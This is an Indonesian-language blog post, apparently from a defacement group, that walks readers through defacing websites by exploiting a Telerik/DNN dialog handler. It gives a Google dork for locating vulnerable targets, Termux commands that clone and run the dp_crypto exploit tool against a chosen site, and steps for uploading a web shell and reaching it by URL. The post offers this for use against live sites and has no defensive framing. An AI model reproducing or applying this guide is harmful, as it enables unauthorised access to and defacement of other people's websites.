Cara Deface Telerik Remote Code Execution
Nah Ok Bahan-bahan
1. Dork : inurl:/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx
2. Termux
3. Tool Exploiter Telerick
Ok Kalian Ngedork Dlu yang Gua Kasih Di Atas Kalo Udh Dorking Ada Text "Loading the Dialog..." Itu Berarti Vuln Seperti Contoh Gambar di Bawah
$pkg install git -y
$pkg install pip
$git clone https://github.com/bao7uo/dp_crypto
$cd dp_crypto
$python3 dp_crypto.py k -u (masukkan website targetnya beserta Exploit nya)
Kalo sudah Seperti Gambar di Bawah
Kalian copy semua Dan Langsung Paste Di Browser Kalian
Setelah di copy kalian paste kan di Browser kalian dan jika berhasil maka akan ada tempat upload seperti gambar dibawah ini
Lalu kalian pencet tombol + warna hijau disana atau cari tulisan upload,lalu kalian upload Shell kalian atau script Lu
Kalau sudah Cara Manggil shell?
site.com/shell kalian
Ok wassalamu'alaikum warahmatullahi wabarakatu
Referensi : https://www.gx-teamofficial.xyz/2020/04/cara-deface-poc-telerik-live-target.html
Posting Komentar untuk "Cara Deface Telerik Remote Code Execution"